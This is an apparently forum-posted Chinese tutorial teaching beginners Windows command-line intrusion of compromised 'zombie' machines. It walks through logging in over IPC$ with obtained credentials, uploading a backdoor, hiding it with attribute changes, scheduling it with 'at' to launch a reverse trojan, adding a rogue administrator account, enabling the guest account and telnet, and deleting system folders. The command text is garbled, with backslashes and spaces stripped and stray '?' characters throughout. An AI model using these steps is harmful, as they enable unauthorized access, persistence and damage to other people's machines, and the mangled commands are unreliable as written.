大家在入侵時，一定會用到DOS命令的，它的功能非常的強大.今天我就對常用的DOS命令作個詳細的解說.主要是給剛入門者和接觸DOS命令少的朋友看的.下麵我挑幾個比較常用的給大家說說.

以windows2000為例，windowsxp類同.

DIR

顯示當前盤下的所有文件夾和文件.

比較常用的方法是，你上傳一個後門或服務端(這兒比如名字叫systems.exe)到肉雞的c:winntsystem32下，你想看看有沒有上傳成功.可以用DIR命令看一下.命令如下:

DIRc:winntsystem32systems.exe

則會顯示:

2004-05-2420:06194，762systems.exe

1個文件194，762字節

0個目錄4，658，597，888可用字節

如果你沒有上傳成功，則顯示如下:

驅動器C中的卷沒有標簽。

卷的序列號是6458-3DB8

c:winntsystem32的目錄

找不到文件

CD

改變當前目錄

具體看一下下麵的命令:

C:〉cdwinnt//進入winnt文件夾

C:winnt〉cdsystem32//進入system32文件夾

C:winntsystem32〉cd..//回到上一級目錄

C:winnt〉cd..

C:〉

C:〉d://進入D盤

D:〉e://進入E盤

E:〉

del和deltree

DEL:刪除文件.

看下麵的命令:

C:〉delc:xxww.txt//刪除C盤的XX目錄下的名叫WW的文件.

C:〉

C:〉delc:xx*.*//刪除C盤的XX目錄下所有文件

deltree

這個更具有破壞xìng，不但能刪除所有文件，連文件夾也刪除

C:〉deltreec:winnt//刪除C盤下的winnt所有文件和文件夾.

這個大家要小心使用.

attrid

顯示和更改文件或文件夾屬xìng.

文件或文件夾的屬xìng有隱藏，用字母H表示.隻讀，用R表示.存檔，用A表示.係統，用S表示

改變一個文件或文件夾屬xìng，‘+‘表示增加，‘-‘，表示去掉某個屬xìng.

平時我們都把後門或服務端到上傳肉雞的c:winntsystem32下.在進入了肉雞的CMD以後，為了更加的不讓肉雞管理員知道，我們可以把你上傳的隱藏起來.比如還是上麵的systems.exe

命令如下:

C:〉attrid+hc:winntsystem32systems.exe//這樣在system32下就找不到systems.exe

C:〉attrid-hc:winntsystem32systems.exe//去掉systems.exe的隱藏屬xìng

copy

複製一個或多個文件到其它目錄

比如你把C盤下一個叫1.txt文件複製到D盤的vv文件夾下，

C:〉copyc:1.txtd:vv1.exe

比如你和肉雞建立了IPC$連接(如何連接？以後會講的)，而且肉雞開放了共享，這裏比如開放了D盤.你可以把你C盤下的一個叫systems.exe的後門或服務端上傳肉雞的D盤下，命令如下:

C:〉copyc:systems.exe肉雞IPd$

type

顯示文件內容

我現在在我的C盤的XX目錄下新建一個叫hack.txt的文件，內容是一些台灣的IP

命令如下:

C:〉typec:xxhack.txt

序號開始IP地址結束IP地址國家/省/直轄市城市/區縣/組織

58024.179.140.000024.179.150.255中國台灣省

80061.013.000.000061.013.255.255中國台灣省

86061.058.065.000061.058.070.255中國台灣省

87061.059.160.000061.059.255.255中國台灣省

89061.070.100.000061.070.150.255中國台灣省

1788061.217.179.000061.217.179.255中國台灣省台南市

1789061.216.000.000061.219.255.255中國台灣省

1790061.220.080.000061.220.150.255中國台灣省台北市

1791061.224.000.000061.224.255.255中國台灣省台北市

1792061.225.000.000061.225.255.255中國台灣省

3390134.208.000.000134.208.255.255中國台灣省

3584139.175.000.000139.175.255.255中國台灣省

3590140.092.000.000140.092.255.255中國台灣省

3593140.096.000.000140.096.255.255中國台灣省

3596140.112.000.000140.112.255.255中國台灣省台灣大學

C:〉

它還有一個用法，就是在進入肉雞的CMD以後，看看肉雞用的是什麼cāo作係統，命令如下，在我電腦cāo作的結果如下:

C:〉typec:boot.ini

[bootloader]

timeout=30

default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS

[operatingsystems]

multi(0)disk(0)rdisk(0)partition(1)WINDOWS=‘MicrosoftWindowsXPProfessional‘

/fastdetect

看出來沒有？，我用的是XP係統.

這是一些我認為常用的命令，其它的還有rd，md等.你們有興趣可以找資料看看.平進比較少用.

ping

這個是用的最多的命令.可是現在好像不靈光了.大多數網站和個人電腦用防火牆屏蔽了ping.大多數時候根本是P不通.基本命令:

pingip

ping網址

下麵P的是本站:

C:〉pingwww.hf110.com

????Pinging?www.hf110.com[218.89.0.231]with?32?bytes?of?data:

????Reply?from?218.89.0.231:?bytes=32?time=67ms?TTL=116

????Reply?from?218.89.0.231:?bytes=32?time=67ms?TTL=116

????Reply?from?218.89.0.231:?bytes=32?time=66ms?TTL=116

????Reply?from?218.89.0.231:?bytes=32?time=67ms?TTL=116

????Ping?statistics?for?218.89.0.231:

????Packets:?Sent=4，?Received=4，?Lost=0(0％loss)，

????Approximate?round?trip?times?in?milli-seconds:

????Minimum=66ms，?Maximum=67ms，?Average=66ms

????上麵P出本站的IP是218.89.0.231，從TTL=116.大略看出使用的是windowscāo作係統.一般來說TTL值在128左右的是windowscāo作係統，值在225左右的，大多數是unix類係統.但是還有特殊情況，管理員可能會通過改注冊表來修改TTL值.

????net?use

????在得到肉雞的用戶名和密碼這後，可以用這個命令做IPC$連接

????net?use肉雞ipipc$‘密碼‘/user:‘用戶名‘

????連接成功後，上傳後門或服務端，(比如叫systems.exe，在你的D盤下).

????copy?D:systems.exe肉雞ipc$//這裏它要開放共享，你才能上傳.否則無法上傳成功.

????net?time肉雞ip//看一下肉雞的時間，是24小時製.比如這兒是下午3點10分.寫作15:10

????at肉雞ip?15:12?systems.exe//在15:12分，運行systems.exe

????在這兒，你上傳的是反彈木馬的話，可以等著它來連接你.其實在入侵過程中，有很多的偶然xìng，比如上麵的，你可以IPC連接成功.但是並一定能夠通過net?time肉雞ip?，看肉雞時間.就算能看到時間吧，有時肉雞的at服務並沒有打開.就算打開了，但是後門或服務端不一定能夠有機會運行，

????可能被殺毒軟件查殺.所以在入侵過程中，失敗是常有的事.這個方法不行，可以另一種.

????這些都是喜歡黑的同誌們長用到的命令，寫給那些需要這些資料的努力進取的人們，我不喜歡發那些不切合實際的文章，希望這篇文章對大家有幫助，如果有寫的不全麵的地方，請高手指出謝謝，如果有沒看懂的菜鳥，可以回複

????1：NET

????隻要你擁有某IP的用戶名和密碼，那就用IPC$做連接吧！

????這裏我們假如你得到的用戶是hbx，密碼是123456。假設對方IP為127.0.0.1

????net?use127.0.0.1ipc$123456/user:hbx

????退出的命令是

????net?use127.0.0.1ipc$/delte

????下麵的cāo作你必須登陸後才可以用.登陸的方法就在上麵.

????下麵我們講怎麼創建一個用戶，由於SA的權限相當於係統的超級用戶.

????我們加一個heibai的用戶密碼為lovechina

????net?user?heibai?lovechina/add

????隻要顯示命令成功，那麼我們可以把他加入Administrator組了.

????net?localgroup?Administrators?heibai/add

????這裏是講映shè對方的C盤，當然其他盤也可以，隻要存在就行了.我們這裏把對方的C盤映shè到本地的Z盤.

????net?use?z:127.0.0.1c$

????net?start?telnet

????這樣可以打開對方的TELNET服務.

????這裏是將Guest用戶激活，guest是NT的默認用戶，而且無法刪除呢？不知道是否這樣，我的2000就是刪除不了它。

????net?user?guest/active:yes

????這裏是把一個用戶的密碼改掉，我們把guest的密碼改為lovechina，其他用戶也可以的。隻要有權限就行了呀！